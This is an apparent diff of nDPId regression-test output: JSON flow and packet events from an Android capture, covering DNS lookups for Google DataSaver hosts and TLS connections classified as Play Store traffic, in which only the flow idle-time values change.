00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1582454871051,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871051,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBq69AAEARCZvAqAIQwKgCAX6cADUALTLn3DQBAAABAAAAAAAABWNoZWNrCWdvb2dsZXppcANuZXQAAAEAAQ=="} 00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871051,"flow_last_seen":1582454871051,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871051,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1582454871056,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871056,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA84WAAAHcGoDvY7yZ4wKgCEAG7gNr8u4aauQzpsaAS6yCywwAAAgQFZAQCCAqJFH+\/\/\/82vAEDAwg="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1582454871057,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871057,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA03w1AAEAGmZbAqAIQ2O8meIDaAbu5DOmx\/LuGm4AQAVfLBwAAAQEICv\/\/Nr+JFH+\/"} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1582454871056,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871056,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA84WAAAHcGoDvY7yZ4wKgCEAG7gNr8u4aauQzpsaAS6yCywwAAAgQFZAQCCAqJFH+\/\/\/82vAEDAwg="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1582454871057,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871057,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA03w1AAEAGmZbAqAIQ2O8meIDaAbu5DOmx\/LuGm4AQAVfLBwAAAQEICv\/\/Nr+JFH+\/"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1582454871058,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1582454871058,"pkt":"MzMAAAACTGr2n\/Ynht1gAAAAABA6\/\/6AAAAAAAAATmr2\/\/6f9if\/AgAAAAAAAAAAAAAAAAAChQAIygAAAAABAUxq9p\/2Jw=="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871061,"flow_last_seen":1582454871061,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454871061,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1582454871061,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1582454871061,"pkt":"xiwDYGpkTGr2n\/YnCABFAABGq7FAAEARCZTAqAIQwKgCAR3sADUAMs+l\/agBAAABAAAAAAAACWRhdGFzYXZlcgpnb29nbGVhcGlzA2NvbQAAAQAB"} 00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871061,"flow_last_seen":1582454871061,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454871061,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871069,"flow_last_seen":1582454871069,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871069,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1582454871069,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871069,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8\/AdAAEAGfJTAqAIQ2O8meIDcAbs4lMrFAAAAAKAC\/\/\/JKwAAAgQFtAQCCAr\/\/zbCAAAAAAEDAwg="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871075,"flow_last_seen":1582454871075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871075,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1582454871075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871075,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8xAhAAEAGtJPAqAIQ2O8meIDeAbsJrvLMAAAAAKAC\/\/\/QBgAAAgQFtAQCCAr\/\/zbEAAAAAAEDAwg="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1582454871083,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871083,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8bmcAAHYGFDXY7yZ4wKgCEAG7gNxV\/jlEOJTKxqAS6yDJiQAAAgQFZAQCCAom516W\/\/82wgEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1582454871087,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871087,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0\/AhAAEAGfJvAqAIQ2O8meIDcAbs4lMrGVf45RYAQAVfhzAAAAQEICv\/\/NsYm516W"} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1582454871088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871088,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8Nk0AAHcGS0\/Y7yZ4wKgCEAG7gN4gvysUCa7yzaAS6yD0TQAAAgQFZAQCCApclUhu\/\/82xAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1582454871089,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871089,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0xAlAAEAGtJrAqAIQ2O8meIDeAbsJrvLNIL8rFYAQAVcMkgAAAQEICv\/\/NsdclUhu"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871069,"flow_last_seen":1582454871069,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871069,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1582454871069,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871069,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8\/AdAAEAGfJTAqAIQ2O8meIDcAbs4lMrFAAAAAKAC\/\/\/JKwAAAgQFtAQCCAr\/\/zbCAAAAAAEDAwg="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871075,"flow_last_seen":1582454871075,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871075,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1582454871075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871075,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8xAhAAEAGtJPAqAIQ2O8meIDeAbsJrvLMAAAAAKAC\/\/\/QBgAAAgQFtAQCCAr\/\/zbEAAAAAAEDAwg="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1582454871083,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871083,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8bmcAAHYGFDXY7yZ4wKgCEAG7gNxV\/jlEOJTKxqAS6yDJiQAAAgQFZAQCCAom516W\/\/82wgEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1582454871087,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871087,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0\/AhAAEAGfJvAqAIQ2O8meIDcAbs4lMrGVf45RYAQAVfhzAAAAQEICv\/\/NsYm516W"} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1582454871088,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871088,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8Nk0AAHcGS0\/Y7yZ4wKgCEAG7gN4gvysUCa7yzaAS6yD0TQAAAgQFZAQCCApclUhu\/\/82xAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1582454871089,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871089,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0xAlAAEAGtJrAqAIQ2O8meIDeAbsJrvLNIL8rFYAQAVcMkgAAAQEICv\/\/NsdclUhu"} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1582454871090,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871090,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRSjQAAEARqwbAqAIBwKgCEAA1fpwAPWeH3DSBgAABAAEAAAAABWNoZWNrCWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAQMABK3CT3I="} 00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":215,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871051,"flow_last_seen":1582454871090,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871090,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"check.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"173.194.79.114"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871094,"flow_last_seen":1582454871094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871094,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1582454871094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871094,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8RuFAAEAGM+7AqAIQrcJPco\/iAFBu6HAoAAAAAKAC\/\/\/iBQAAAgQFtAQCCAr\/\/zbJAAAAAAEDAwg="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871094,"flow_last_seen":1582454871094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871094,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1582454871094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871094,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8RuFAAEAGM+7AqAIQrcJPco\/iAFBu6HAoAAAAAKAC\/\/\/iBQAAAgQFtAQCCAr\/\/zbJAAAAAAEDAwg="} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1582454871100,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1582454871100,"pkt":"TGr2n\/YnxiwDYGpkCABFAABWpmUAAEARTtDAqAIBwKgCEAA1HewAQssi\/aiBgAABAAEAAAAACWRhdGFzYXZlcgpnb29nbGVhcGlzA2NvbQAAAQABwAwAAQABAAABKwAErNkVyg=="} 00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":217,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871061,"flow_last_seen":1582454871100,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454871100,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.21.202"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871103,"flow_last_seen":1582454871103,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871103,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1582454871103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871103,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8ApdAAEAGssnAqAIQrNkVysrYAbsvYjRcAAAAAKAC\/\/9bhgAAAgQFtAQCCAr\/\/zbLAAAAAAEDAwg="} -01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871075,"flow_last_seen":1582454871103,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871103,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871042,"flow_last_seen":1582454871105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871105,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871103,"flow_last_seen":1582454871103,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871103,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1582454871103,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871103,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8ApdAAEAGssnAqAIQrNkVysrYAbsvYjRcAAAAAKAC\/\/9bhgAAAgQFtAQCCAr\/\/zbLAAAAAAEDAwg="} +01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871075,"flow_last_seen":1582454871103,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871103,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871042,"flow_last_seen":1582454871105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871105,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871115,"flow_last_seen":1582454871115,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454871115,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 